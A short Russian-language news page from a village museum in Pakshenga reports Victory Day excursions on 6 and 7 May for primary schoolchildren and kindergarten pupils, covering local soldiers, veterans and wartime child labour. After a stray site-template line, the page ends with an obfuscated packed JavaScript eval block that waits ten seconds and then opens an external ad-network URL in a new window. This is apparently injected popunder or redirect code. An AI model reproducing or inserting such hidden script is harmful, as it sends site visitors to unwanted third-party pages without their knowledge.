Экскурсии в музей

6 мая состоялась военно-патриотическая экскурсия в музей учащихся начальных классов школы, приуроченная  к Дню победы. Им были представлены материалы о Великой Отечественной войне, об односельчанах, ушедших и не вернувшихся с фронта, о ветеранах, которые возвратились с полей сражений, но, которых, к сожалению, уже нет с нами.

Дети с интересом слушали о своих земляках, о нелегкой доле, выпавшей на плечи подростков того времени, трудившихся на колхозных полях за себя и за взрослых, ушедших на войну.

    А 7 мая музей посетили самые маленькие жители Пакшеньги. Дети с интересом рассматривали фотографии своих прадедушек. Может быть, воспитанники детского сада и не запомнили всего того, что им было рассказано и представлено, но слушали ребята внимательно, и впечатлений у них осталось много. Уходя из музея, они пообещали, когда подрастут, обязательно прийти сюда еще не раз.

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))